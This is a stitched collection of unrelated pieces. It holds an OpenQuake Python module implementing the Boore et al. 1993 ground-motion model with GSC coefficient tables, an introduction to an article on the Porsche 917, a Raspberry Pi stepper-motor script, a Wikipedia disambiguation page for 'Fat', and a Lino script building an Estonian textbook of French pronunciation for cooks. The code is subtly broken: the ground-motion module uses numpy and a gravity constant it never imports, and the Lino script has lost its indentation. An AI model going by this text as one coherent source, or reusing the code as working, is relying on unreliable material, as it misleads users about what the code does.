from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, SA
class BooreEtAl1993GSCBest(GMPE):
    """
    Implement equation used by the Geological Survey of Canada (GSC) for
    the 2010 Western Canada National Seismic Hazard Model. The class implements
    the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
    ("Estimation of Response Spectra and Peak Accelerations from Western North
    American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
    Open File Report 93-509).

    Equation coefficients provided by GSC for the random horizontal component
    and corresponding to the 'Best' case (that is mean unaffected)
    """
    #: Supported tectonic region type is active shallow crust, given
    #: that the equations have been derived for Western North America
    DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST

    #: Supported intensity measure types are spectral acceleration,
    #: and peak ground acceleration
    DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
        PGA,
        SA
    ])

    #: Supported intensity measure component is random horizontal
    #: :attr:`~openquake.hazardlib.const.IMC.RANDOM_HORIZONTAL`,
    DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RANDOM_HORIZONTAL

    #: Supported standard deviation type is total
    DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
        const.StdDev.TOTAL
    ])

    #: site params are not required
    REQUIRES_SITES_PARAMETERS = set()

    #: Required rupture parameter is magnitude
    REQUIRES_RUPTURE_PARAMETERS = set(('mag', ))

    #: Required distance measure is Rjb distance
    #: see paragraph 'Predictor Variables', page 6.
    REQUIRES_DISTANCES = set(('rjb', ))

    def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
        """
        See :meth:`superclass method
        <.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
        for spec of input and result values.
        """
        C = self.COEFFS[imt]
        # the functional form uses magnitude measured relative to M6
        mag = rup.mag - 6
        # effective distance: Rjb combined in quadrature with coefficient
        # c7 (presumably a fictitious-depth saturation term -- TODO confirm
        # against OFR 93-509)
        d = np.sqrt(dists.rjb ** 2 + C['c7'] ** 2)

        # base term: quadratic in (mag - 6) plus the c6 offset, in log10
        # units of cm/s**2 (converted to ln g below)
        mean = np.zeros_like(d)
        mean += C['c1'] + C['c2'] * mag + C['c3'] * mag ** 2 + C['c6']

        # within 100 km: c5 * log10(d) distance term
        idx = d <= 100.
        mean[idx] = mean[idx] + C['c5'] * np.log10(d[idx])

        # beyond 100 km: distance term is frozen at 100 km and additional
        # attenuation terms (-log10(d/100) and linear c4 * (d - 100)) apply
        idx = d > 100.
        mean[idx] = (mean[idx] + C['c5'] * np.log10(100.) -
                     np.log10(d[idx] / 100.) + C['c4'] * (d[idx] - 100.))

        # convert from log10 to ln and from cm/s**2 to g
        mean = np.log((10.0 ** (mean - 2.0)) / g)

        stddevs = self._get_stddevs(C, stddev_types, dists.rjb.shape[0])

        return mean, stddevs

    def _get_stddevs(self, C, stddev_types, num_sites):
        """
        Return total standard deviation.
        """
        # only total stddev is defined for this model; each requested type
        # yields a constant per-site array of C['sigma']
        assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
                   for stddev_type in stddev_types)
        stddevs = [np.zeros(num_sites) + C['sigma'] for _ in stddev_types]
        return stddevs

    #: coefficient table provided by GSC
    COEFFS = CoeffsTable(sa_damping=5, table="""\
    IMT  c1     c2     c3      c4        c5      c6     c7    sigma
    pga  2.887  0.229  0.0    -0.00326  -0.778   0.162  5.57  0.529
    0.1  3.451  0.327 -0.098  -0.00395  -0.934   0.046  6.27  0.479
    0.2  3.464  0.309 -0.090  -0.00259  -0.924   0.190  7.02  0.495
    0.3  3.295  0.334 -0.070  -0.00202  -0.893   0.239  5.94  0.520
    0.5  2.980  0.384 -0.039  -0.00148  -0.846   0.279  4.13  0.562
    1.0  2.522  0.450 -0.014  -0.00097  -0.798   0.314  2.90  0.622
    2.0  2.234  0.471 -0.037  -0.00064  -0.812   0.360  5.85  0.675
    """)
class BooreEtAl1993GSCUpperLimit(BooreEtAl1993GSCBest):
    """
    Implement equation used by the Geological Survey of Canada (GSC) for
    the 2010 Western Canada National Seismic Hazard Model. The class implements
    the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
    ("Estimation of Response Spectra and Peak Accelerations from Western North
    American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
    Open File Report 93-509).

    Equation coefficients provided by GSC for the random horizontal component
    and corresponding to the 'Upper Limit' case (that is mean value + 0.7 nat
    log)
    """
    #: coefficient table provided by GSC
    #: (identical to the 'Best' table except that c1 is shifted by +0.3
    #: log10 units, i.e. about +0.7 in natural-log units)
    COEFFS = CoeffsTable(sa_damping=5, table="""\
    IMT  c1     c2     c3      c4        c5      c6     c7    sigma
    pga  3.187  0.229  0.0    -0.00326  -0.778   0.162  5.57  0.529
    0.1  3.751  0.327 -0.098  -0.00395  -0.934   0.046  6.27  0.479
    0.2  3.764  0.309 -0.090  -0.00259  -0.924   0.190  7.02  0.495
    0.3  3.595  0.334 -0.070  -0.00202  -0.893   0.239  5.94  0.520
    0.5  3.280  0.384 -0.039  -0.00148  -0.846   0.279  4.13  0.562
    1.0  2.822  0.450 -0.014  -0.00097  -0.798   0.314  2.90  0.622
    2.0  2.534  0.471 -0.037  -0.00064  -0.812   0.360  5.85  0.675
    """)
class BooreEtAl1993GSCLowerLimit(BooreEtAl1993GSCBest):
    """
    Implement equation used by the Geological Survey of Canada (GSC) for
    the 2010 Western Canada National Seismic Hazard Model. The class implements
    the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
    ("Estimation of Response Spectra and Peak Accelerations from Western North
    American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
    Open File Report 93-509).

    Equation coefficients provided by GSC for the random horizontal component
    and corresponding to the 'Lower Limit' case (that is mean value - 0.7 nat
    log)
    """
    #: coefficient table provided by GSC
    #: (identical to the 'Best' table except that c1 is shifted by -0.3
    #: log10 units, i.e. about -0.7 in natural-log units)
    COEFFS = CoeffsTable(sa_damping=5, table="""\
    IMT  c1     c2     c3      c4        c5      c6     c7    sigma
    pga  2.587  0.229  0.0    -0.00326  -0.778   0.162  5.57  0.529
    0.1  3.151  0.327 -0.098  -0.00395  -0.934   0.046  6.27  0.479
    0.2  3.164  0.309 -0.090  -0.00259  -0.924   0.190  7.02  0.495
    0.3  2.995  0.334 -0.070  -0.00202  -0.893   0.239  5.94  0.520
    0.5  2.680  0.384 -0.039  -0.00148  -0.846   0.279  4.13  0.562
    1.0  2.222  0.450 -0.014  -0.00097  -0.798   0.314  2.90  0.622
    2.0  1.934  0.471 -0.037  -0.00064  -0.812   0.360  5.85  0.675
    """)
|
Image Gallery: Exotic Cars The Porsche 917 got off to a rocky start in the late 1960s, but after a little tweaking, the German automaker had more than just a winner on their hands -- they had a true legend. See more pictures of exotic cars.
If someone were to make a list of the greatest racecars ever made, the Porsche 917 would almost certainly have to be on it. In fact, the 917 makes a pretty good case for itself to be the greatest racecar of all time.
Want some proof? How about how with some iterations of the car rated between 1,110 and 1,500 horsepower, it remains one of the most powerful racecars ever made -- not bad for a car that competed in the early 1970s.
Then there's how the car dominated at the track, securing multiple victories at the 24 Hours of Le Mans, Daytona, Watkins Glen and a host of other events and tracks. The car was also immortalized in the Steve McQueen film "Le Mans," which included footage of its victory in that race in 1970 [source: Lieberman].
There are many more reasons why the 917 is considered among the all-time greats. If you don't immediately recognize those three numbers, don't worry -- you've probably seen the car in photographs somewhere.
With the car's low, wide shape that included a tapering tail at the back, swooping front fenders and massive tires, it looked especially striking in its iconic blue-and-orange Gulf Oil livery. Yes, it's that car.
According to Porsche, when 50 international motor sports experts from the British magazine Motor Sport were asked to name the greatest racing car in history, they cited the Porsche 917 [source: Porsche].
But while its reputation is considerable today, the 917 got off to a rocky start in the late 1960s when Porsche struggled to build enough examples of the car to qualify for competition. Then they had trouble finding drivers brave enough to drive the beast, whose power far outpaced its handling. It was also initially plagued with development problems. But Porsche persevered with the 917, and after some tweaks, the German automaker had more than just a winner on their hands -- they had the makings of a legend.
In this article we'll learn all about what made the iconic 917 tick, and take a look at its lasting impact on racing and popular culture.
|
import RPi.GPIO as GPIO
import time
# Use Broadcom (BCM) pin numbering for all GPIO calls below.
GPIO.setmode(GPIO.BCM)

# Stepper-driver pin assignments (BCM numbers; earlier wirings kept in
# the trailing comments).
enable_pin = 27 #18
coil_A_2_pin = 18 #23 #17
coil_A_1_pin = 23 #18 #4
coil_B_1_pin = 25 #23
coil_B_2_pin = 24 #24

# Configure the enable line and all four coil pins as outputs.
GPIO.setup(enable_pin, GPIO.OUT)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)

# Assert the driver's enable line so the coils can be energized.
GPIO.output(enable_pin, 1)
def forward(delay, steps):
    """Step the motor forward.

    Runs *steps* cycles of the 4-phase full-step sequence, pausing
    *delay* seconds between phase changes.

    :param delay: pause in seconds between coil pattern changes
    :param steps: number of 4-phase step cycles to perform
    """
    # NOTE: the original kept an alternative 8-phase half-stepping
    # sequence as commented-out dead code; it has been removed.
    for _ in range(0, steps):
        setStep(1, 0, 1, 0)
        time.sleep(delay)
        setStep(0, 1, 1, 0)
        time.sleep(delay)
        setStep(0, 1, 0, 1)
        time.sleep(delay)
        setStep(1, 0, 0, 1)
        time.sleep(delay)
def backwards(delay, steps):
    """Step the motor in reverse: *steps* cycles of the 4-phase sequence,
    pausing *delay* seconds between phase changes."""
    # reverse of the forward() full-step sequence
    sequence = ((1, 0, 0, 1),
                (0, 1, 0, 1),
                (0, 1, 1, 0),
                (1, 0, 1, 0))
    for _ in range(steps):
        for pattern in sequence:
            setStep(*pattern)
            time.sleep(delay)
def setStep(w1, w2, w3, w4):
    """Drive the four coil pins to the given logic levels (one level per
    coil terminal, in A1/A2/B1/B2 order)."""
    levels = ((coil_A_1_pin, w1),
              (coil_A_2_pin, w2),
              (coil_B_1_pin, w3),
              (coil_B_2_pin, w4))
    for pin, level in levels:
        GPIO.output(pin, level)
# Interactive loop: prompt for a per-step delay and step counts, then run
# the motor forward and backwards.  Loops until interrupted (no
# GPIO.cleanup() on exit -- TODO confirm that is acceptable here).
while True:
    #setStep(1,1,1,1)
    delay = raw_input("Delay between steps (milliseconds)?")
    steps = raw_input("How many steps forward? ")
    forward(int(delay) / 1000.0, int(steps))  # convert ms -> seconds
    steps = raw_input("How many steps backwards? ")
    backwards(int(delay) / 1000.0, int(steps))
|
Fat is an oily or greasy organic substance.
"Fat", a short story by Raymond Carver from the collection Will You Please Be Quiet, Please?
Ralph Waldsmith (1892-1925), an American football player in the early days of the National Football League, nicknamed "Fat"
Fath, Iran, a village also known as "Fāt"
Gordo (disambiguation), the Spanish and Portuguese word for "fat"
This disambiguation page lists articles associated with the title Fat.
This page was last edited on 29 March 2019, at 01:46 (UTC).
|
# -*- coding: UTF-8 -*-
## Copyright 2011-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from lino.modlib.vocbook.fr import French, Autre, Nom, NomPropre, Adjectif, Numerique, Verbe, NomGeographique
from lino.modlib.vocbook.et import Estonian
from lino.modlib.vocbook.base import Book, FR, M, F, ET, PRON, GEON, GEOM, GEOF
if __name__ == '__main__':
if len(sys.argv) != 3:
raise Exception("""
Usage : %(cmd)s rst OUTPUT_ROOT_DIR
%(cmd)s odt OUTPUT_FILE
""" % dict(cmd=sys.argv[0]))
output_format = sys.argv[1]
else:
output_format = 'rst' #
if output_format == "rst":
FULL_CONTENT = True
else:
FULL_CONTENT = False
HAS_FUN = True
HAS_EXERCICES = False
book = Book(French,Estonian,
title="Kutsealane prantsuse keel kokkadele",
input_template=os.path.join(os.path.dirname(__file__),'Default.odt'))
#~ os.path.join(os.path.dirname(__file__),'cfr.odt')
Pronounciation = book.add_section(u"Hääldamine",intro=u"""
Esimeses osas keskendume hääldamisele.
Siin pole vaja meelde jätta näidissõnu,
vaid et sa oskaksid neid ette lugeda õigesti hääldades.
""")
Intro = Pronounciation.add_section("Sissejuhatus",intro="""
""")
Eestlastele = Pronounciation.add_section("Eestlastele",intro="""
""")
Pronounciation.add_lesson(u"Hääldamisreeglite spikker", intro=u"""
Hääldamisreeglid:
[ruleslist
ai
ail
ain
an
au
c
cedille
ch
eau
eil
ein
en
ent
er
et
eu
euil
g
gn
gu
h
ien
il
ill
in
j
oi
oe
oin
on
ou
u
ueil
ui
un
y]
""")
Reeglid = Pronounciation.add_section(u"Reeglid",ref="reeglid")
if output_format == "rst":
Reeglid.intro = u"""
Ülevaade:
- [ref u], [ref ou], [ref ui], [ref eu], [ref au], [ref eau], [ref oi], [ref ai], [ref y], [ref oe]
- [ref on], [ref an], [ref en], [ref un], [ref in], [ref ain], [ref ein], [ref ien], [ref oin]
- [ref c], [ref h], [ref ch], [ref cedille]
- [ref er], [ref et], [ref ent]
- [ref j], [ref g], [ref gu], [ref gn]
- [ref il], [ref ill], [ref ail], [ref eil], [ref euil], [ref ueil]
"""
#~ if FULL_CONTENT:
#~ Eesti = Pronounciation.add_section(u"Veel")
#~ Vocabulary = book.add_section(u"Sõnavara",intro=u"""
#~ Teises osa hakkame õpima sõnavara,
#~ oletades et hääldamine on enam vähem selge.
#~ """)
Vocabulary = book
#~ General = Vocabulary.add_section(u"Üldiselt")
General = Vocabulary.add_section(u"Üldine sõnavara")
Kokadele = Vocabulary.add_section(u"Kulinaaria")
if HAS_FUN:
Fun = Vocabulary.add_section(u"Laulud")
if HAS_EXERCICES:
Exercices = Vocabulary.add_section(u"Harjutused")
Intro.add_lesson(u"Tuntud sõnad", intro=u"""
Mõned sõnad, mida sa juba tead.
Tutvumine hääldamiskirjaga.
""")
Intro.parse_words(None,u"""
la soupe [sup] : supp
la carte [kart] : kaart
à la carte [ala'kart] : menüü järgi
le vase [vaaz] : vaas
la douche [duš] : dušš
le disque [disk] : ketas
merci [mär'si] : aitäh
le garage [ga'raaž] : garaaž
le journal [žur'nal] : päevik | ajaleht
""")
Intro.add_after(u"""
Kuna hääldamine on algaja peamine raskus,
tuleb meil seda kuidagi kirja panna.
Seda teeme sõnade taha nurksulgudes (**[]**).
- **ou** hääldatakse **[u]**.
- **e** sõna lõpus kaob ära
""")
Intro.add_lesson(u"Hääldamiskirjeldus", intro=u"""
Hääldamiskirjeldustes kasutame
kohandatud `X-SAMPA
<http://fr.wiktionary.org/wiki/Annexe:Prononciation/fran%C3%A7ais>`_ variant,
mis on eestlastele intuitiivsem õppida
kui näiteks `IPA
<http://en.wiktionary.org/wiki/Wiktionary:IPA>`_ (International
Phonetic Alphabet).
- Üldiselt loed lihtsalt seda, mis on nurksulgudes.
- Pikad kaashäälikud on topelt.
- Apostroof (') näitab, milline silp on **rõhutatud**.
Prantsuse keeles on rõhk tavaliselt viimasel silbil.
Mõned helid tuleb õppida:
==== ================== ====================== =======================================
täht selgitus näided e.k. näided pr.k.
==== ================== ====================== =======================================
[ə] tumm e Lott\ **e** **je** [žə], **ne** [nə]
[o] kinnine o L\ **oo**\ ne **mot** [mo], **beau** [boo]
[O] avatud o L\ **o**\ tte **bonne** [bOn], **mort** [mOOr]
[ö] kinnine ö l\ **öö**\ ve **feu** [föö], **peu** [pöö]
[Ö] avatud ö ingl.k. "g\ **ir**\ l" **beurre** [bÖÖr], **jeune** [žÖÖn]
[w] pehme w ingl.k. "\ **w**\ ow" **toilettes** [twa'lät], **boudoir** [bud'waar]
[O~] nasaalne [o] - **bonjour** [bO~'žuur], **mon** [mO~]
[A~] nasaalne [O] - **tante** ['tA~tə], **prendre** ['prA~drə]
[Ö~] nasaalne [Ö] - **un** [Ö~], **parfum** [par'fÖ~]
[Ä~] nasaalne [ä] - **chien** [šiÄ~], **rien** [riÄ~]
==== ================== ====================== =======================================
""")
Eestlastele.add_lesson("Mesilashäälikud", intro="""
"Mesilashäälikud" on **s**, **š**, **z** ja **ž**.
Nad on eesti keeles ka olemas, aga prantsuse keeles on
nende erinevus palju olulisem.
=========== ===========================
terav pehme
=========== ===========================
**s**\ upp **z**\ oom
**š**\ okk **ž**\ est
=========== ===========================
""",ref="s")
Eestlastele.parse_words(None,u"""
la soupe [sup] : supp
le garage [ga'raaž] : garaaž
le geste [žäst] : žest | liigutus
le choc [žOk] : šokk | löök
""")
if FULL_CONTENT:
Eestlastele.parse_words(None,u"""
le genre [žA~rə] : žanre
""")
Intro.add_lesson(u"Artikkel", intro=u"""
Nagu inglise keeles pannakse ka prantsuse keeles nimisõnade ette *artikkel*.
Prantsuse keeles on kõikidel asjadel lisaks oma **sugu**.
Näiteks laud (*la table*) on naissoost,
raamat (*le livre*) on meessoost.
Kui sul on mitu lauda või mitu raamatu,
siis on neil sama artikkel **les**: *les tables* ja *les livres*.
Kui sõna algab täishäälikuga, siis kaob
artiklitest *le* ja *la* viimane
täht ära ja nad muutuvad mõlemad **l'**-ks.
Artiklid *le*, *la* ja *les* nimetatakse **määravaks** artikliteks.
Määrava artikli asemel võib ka olla **umbmäärane** artikkel:
**un** (meessoost), **une** (naissoost) või **des** (mitmus).
Erinevus on nagu inglise keeles, kus on olemas määrav
artikkel **the** ja umbmäärane artikel **a**.
Olenevalt kontekstist kasutatakse kas see või teine.
Näiteks
"I am **a** man from Vigala"
ja
"I am **the** man you need".
Kokkuvõteks:
========== ============= =============
sugu määrav umbmäärane
========== ============= =============
meessoost **le** [lə] **un** [Ö~]
naissoost **la** [la] **une** [ün]
mitmus **les** [lä] **des** [dä]
========== ============= =============
""")
#~ Intro.parse_words(Autre,u"""
#~ le [lə] : (määrav meessoost artikkel)
#~ la [la] : (määrav naissoost artikkel)
#~ les [lä] : (määrav artikkel mitmus)
#~ """)
#~ Intro.parse_words(Autre,u"""
#~ un [Ö~] : (umbmäärane meessoost artikkel)
#~ une [ün] : (umbmäärane naissoost artikkel)
#~ des [dä] : (umbmäärane artikkel mitmus)
#~ """)
Intro.add_lesson(u"Rõhutud, aga lühike", intro=u"""
Rõhutatud täishäälikud ei ole sellepärast tingimata pikad.
Prantsuse keeles tuleb tihti ette, et sõna lõpeb *lühikese* täishäälikuga.
""")
Intro.parse_words(Nom,u"""
le menu [mə'nü] : menüü
le chocolat [šoko'la] : šokolaad
le plat [pla] : roog | kauss
le cinéma [sine'ma] : kino
le paradis [para'di] : paradiis
""")
Intro.add_lesson(u"O on kinnine või avatud", u"""
Helid **[o]** ja **[ö]** on eesti keeles alati *kinnised*.
Prantsuse keeles on lisaks ka *avatud* vormid.
Hääldamiskirjelduses on kinnine vorm **väikese** tähega ja
avatud vorm **suure** tähega.
""")
Intro.parse_words(Autre,u"""
je donne [dOn] : ma annan
je dors [dOOr] : ma magan
""")
Intro.parse_words(Nom,u"""
le dos [do] : selg
le mot [mo] : sõna
le tome [toom] : köide
""")
if FULL_CONTENT:
Intro.parse_words(Nom,u"""
la mort [mOOr] : surm
le or [OOr] : kuld
le boulot [bu'lo] : töö (kõnekeel)
le bouleau [bu'loo] : kask
le bureau [bü'roo] : büroo
""")
if not FULL_CONTENT:
Eestlastele.add_lesson(u"Cold gold, big pigs and downtowns", u"""
Erinevus tugeva ja nõrda K, P või T vahel on prantsuse keeles sama
oluline nagu inglise ja saksa keeles.
""",ref="kpt")
Eestlastele.parse_words(Autre,u"""
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le doigt [dwa] : sõrm
le toit [twa] : katus
""")
else:
Eestlastele.add_lesson(u"b ja p", u"""
b ja p on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le bon [bO~] : tšekk | talong
le pont [pO~] : sild
le bon ton [bO~'tO~] : viisakus
le ponton [pO~'tO~] : pontoon (nt. pontoonsild)
la peau [poo] : nahk
beau (m.) : ilus
le bois [bwa] : puu (materjal) | mets
le poids [pwa] : kaal
""")
Eestlastele.add_lesson(u"d ja t", u"""
d ja t on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le don [dO~] : annetus
le ton [tO~] : toon
le centre ['sA~trə] : keskus
la cendre ['sA~drə] : tuhk
je donne [dOn] : ma annan
la tonne [tOn] : tonn
le toit [twa] : katus
le doigt [dwa] : sõrm
""")
Eestlastele.add_lesson(u"g ja k", u"""
g ja k on prantsuse keeles selgelt erinevad.
""")
Eestlastele.parse_words(None,u"""
le gond [gO~] : uksehing
le con [kO~] : loll
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
car [kaar] : sest
le garçon [gar'sO~] : poiss
Qui est Guy? [ki ä gi] : Kes on Guy?
""")
Reeglid.add_lesson(u"u", intro=u"""
**u** (siis kui see pole teise täishäälikuga koos)
hääldatakse **[ü]** või **[üü]**.
""",ref="u")
Reeglid.parse_words(Nom,u"""
le bureau [bü'roo] : büroo
le bus [büs] : buss
# le mur [müür] : sein | müür
la puce [püs] : kirp
le jus [žü] : mahl
# le but [büt] : eesmärk
# la pute [püt] : hoor
le sucre ['sükrə] : suhkur
""")
Reeglid.add_lesson(u"ou", intro=u"""
**ou** hääldatakse **[u]** või **[uu]**.
""",ref="ou")
Reeglid.parse_words(None,u"""
le journal [žur'nal] : päevik | ajaleht
le cours [kuur] : kursus | tund (koolis)
le cou [ku] : kael
le goût [gu] : maitse
""")
Reeglid.add_lesson(u"ui",
u"""
**ui** hääldatakse **[wi]** või **[wii]** (mida
kirjutatakse vahest ka **[üi]** või **[üii]**).
""",ref="ui")
Reeglid.parse_words(None,u"""
la suite [swit] : järg | tagajärg | rida, kord | saatjaskond
bonne nuit [bOnə 'nwi] : head ööd
la cuisine [kwi'zin] : köök
je cuis [žə kwi] : ma keedan
je suis [žə swi] : ma olen | ma järgnen
""")
Reeglid.add_lesson(u"eu", u"""
**eu** hääldatakse **[öö]** või **[ÖÖ]**.
""",ref="eu")
Reeglid.parse_words(None,u"""
le feu [föö] : tuli
# le neveu [nə'vöö] : onupoeg | tädipoeg
je veux [žə vöö] : ma tahan
""")
Reeglid.parse_words(Autre,u"""
# neutre (mf) ['nöötrə] : neutraalne
""")
Reeglid.parse_words(Numerique,u"""
neuf [nÖf] : üheksa
""")
Reeglid.parse_words(Nom,u"""
le professeur [profesÖÖr] : professor
le beurre [bÖÖr] : või
la peur [pÖÖr] : hirm
""")
#~ Reeglid.parse_words(None,u"""
#~ l'huile (f) [wil] : õli
#~ cuire [kwiir] : keetma
#~ suivre ['swiivrə] : järgima
#~ la cuillère [kwi'jäär] : lusikas
#~ """)
Reeglid.add_lesson(u"au",
intro=u"""
**au** hääldatakse **[o]** või **[oo]**.
""",ref="au")
Reeglid.parse_words(None,u"""
une auberge [o'bäržə] : võõrastemaja
un auteur [o'tÖÖr] : autor
""")
Reeglid.add_lesson(u"eau",
intro=u"""
**eau** hääldatakse **[oo]**.
Nagu [ref au], aga **e** ühineb nendega ja kaob ära.
""",ref="eau")
Reeglid.parse_words(None,u"""
le château [ša'too] : loss
le bateau [ba'too] : laev
la eau [oo] : vesi
""")
Reeglid.add_lesson(u"oi",
u"""
**oi** hääldatakse **[wa]**.
Vaata ka [ref oin].
""",ref="oi")
Reeglid.parse_words(Autre,u"""
voilà [vwa'la] : näe siin
trois [trwa] : kolm
bonsoir [bO~'swaar] : head õhtut
au revoir [orə'vwaar] : nägemiseni
""")
Reeglid.parse_words(Nom,u"""
le roi [rwa] : kuningas
la loi [lwa] : seadus
la toilette [twa'lät] : tualett
""")
Reeglid.add_lesson(u"ai",
u"""
**ai** hääldatakse **[ä]** või **[ää]**
(mõnikord ka **[ə]**).
""",ref="ai")
Reeglid.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le domaine [do'mään] : domeen
la fraise [frääz] : maasikas
# la paire [päär] : paar
""")
Reeglid.parse_words(Adjectif,u"""
frais [frä] | fraiche [fräš] : värske
""")
Reeglid.parse_words(None,u"""
nous faisons [nu fə'zO~] : meie teeme
le faisan [fə'zA~] : faasan
""")
Reeglid.add_lesson(u"y", u"""
**y** hääldatakse alati **[i]** ja mitte kunagi **[ü]**.
""",ref="y")
Reeglid.parse_words(Nom,u"""
le cygne ['sinjə] : luik
le système [sis'tääm] : süsteem
le mythe [mit] : müüt
""")
Reeglid.add_lesson(u"œ", u"""
**œ** hääldatakse alati **[ÖÖ]**.
""",ref="oe")
Reeglid.parse_words(Nom,u"""
# le nœud [nöö] : sõlm
le cœur [kÖÖr] : süda
#le chœur [kÖÖr] : koor (laulu-)
le bœuf [bÖff] : härg
le œuf [Öf] : muna
la œuvre [ÖÖvrə] : töö, teos
le *hors d'œuvre [hOOr 'dÖÖvrə] : eelroog
""")
if HAS_FUN:
Fun.add_lesson(u"Frère Jacques", u"""
| Frère Jacques, frère Jacques,
| dormez-vous? Dormez-vous?
| Sonnez les matines, sonnez les matines
| ding, dang, dong! Ding, dang, dong!
""")
Fun.parse_words(NomPropre,u"""
Jacques [žaak] : Jaak
""")
Fun.parse_words(None,u"""
le frère [fräär] : vend
dormez-vous? [dOrmee'vu] : kas Te magate?
Sonnez les matines [sO'ne lä ma'tinə] : lööge hommikukellad
""")
Fun.add_lesson(u"Dans sa maison un grand cerf ", u"""
| Dans sa maison un grand cerf
| regardait par la fenêtre
| un lapin venir à lui
| et frapper ainsi.
| «Cerf, cerf, ouvre moi
| ou le chasseur me tuera!»
| «Lapin, lapin entre et viens
| me serrer la main.»
""")
Fun.parse_words(Verbe,u"""
il regardait [rəgar'dä] : ta vaatas
""")
Fun.parse_words(None,u"""
ouvre-moi [uuvrə'mwa] : tee mulle lahti
ou [u] : või
il me tuera [il mə tüə'ra] : ta tapab mind
serrer [sä'ree] : suruma
grand [grA~] | grande [grA~də]: suur
""")
Fun.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le cerf [säär] : hirv
la fenêtre [fə'näätrə] : aken
le lapin [lapÄ~] : küünik
le chasseur [ša'sÖÖr] : jahimees
la main [mÄ~] : käsi
""")
Fun.add_lesson(u"Un kilomètre à pied", u"""
| Un kilomètre à pied,
| ça use, ça use,
| un kilomètre à pied,
| ça use les souliers.
""")
Fun.parse_words(None,u"""
le pied [pjee] : jalaots
à pied [a'pjee] : jalgsi
ça use [sa 'üüzə] : see kulutab
le soulier [sul'jee] : king
""")
Fun.add_lesson(u"La peinture à l'huile", u"""
| La peinture à l'huile
| c'est bien difficile
| mais c'est bien plus beau
| que la peinture à l'eau
""")
Fun.parse_words(None,u"""
la peinture [pÄ~'tüür] : värvimine
la huile [wilə] : õli
la eau [oo] : vesi
difficile [difi'silə] : raske
mais [mä] : aga
beau [boo] | belle [bälə] : ilus
plus beau [plü boo] : ilusam
""")
if HAS_FUN:
Fun.add_lesson(u"Meunier, tu dors", u"""
| Meunier, tu dors, ton moulin va trop vite.
| Meunier, tu dors, ton moulin va trop fort.
| Ton moulin, ton moulin va trop vite.
| Ton moulin, ton moulin va trop fort.
""")
Fun.parse_words(None,u"""
le meunier [mÖn'jee] : mölder
le moulin [mu'lÄ~] : veski
tu dors [dOOr] : sa magad
trop vite [tro'vitə] : liiga kiiresti
trop fort [tro'fOOr] : liiga kõvasti
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Minu onu...",
u"""
| Mon tonton et ton tonton sont deux tontons,
| mon tonton tond ton tonton
| et ton tonton tond mon tonton.
| Qu'est-ce qui reste?
""")
Fun.parse_words(None,u"""
mon [mO~] : minu
ton [tO~]: sinu
ils sont [sO~]: nad on
""")
Fun.parse_words(Numerique,u"""
deux [döö] : kaks
""")
Fun.parse_words(Nom,u"""
le tonton [tO~'tO~] : onu
""")
Fun.parse_words(Verbe,u"""
tondre [tO~drə] : pügama
rester [räs'tee] : üle jääma
""")
Fun.parse_words(None,u"""
Qu'est-ce qui reste? [käski'räst?] : Mis jääb üle?
""")
#~ """
#~ le nôtre ['nootrə] : meie oma
#~ """
Reeglid.add_lesson(u"on & om",
u"""
**on** ja **om** hääldatakse **[O~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="on")
Reeglid.parse_words(Nom,u"""
le salon [sa'lO~] : salong (= uhke tuba)
# un oncle [O~klə] : onu
la bombe ['bO~mbə] : pomm
""")
Reeglid.parse_words(Autre,u"""
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonne nuit [bOnə 'nwi] : head ööd
bon appétit [bOnappe'ti] : head isu
""")
Reeglid.add_lesson(u"an & am",
u"""
**an** ja **am** hääldatakse **[A~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="an")
Reeglid.parse_words(Nom,u"""
le an [A~] : aasta
la année [a'nee] : aasta
la lampe [lA~p] : lamp
le enfant [A~'fA~] : laps
""")
Reeglid.add_lesson(u"en & em",
u"""
**en** ja **em** hääldatakse **[A~]**,
v. a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="en")
Reeglid.parse_words(Nom,u"""
le rendez-vous [rA~de'vu] : kohtumine
# le commentaire [komA~'täär] : märkus, kommentar
le centre ['sA~trə] : keskus
le renne [rän] : põhjapõder
# le genre [žA~rə] : žanre
un enfant [A~'fA~] : laps
le employeur [A~plwa'jÖÖr] : tööandja
""")
Reeglid.add_lesson(u"un & um",
u"""
**um** ja **un** hääldatakse **[Ö~]**,
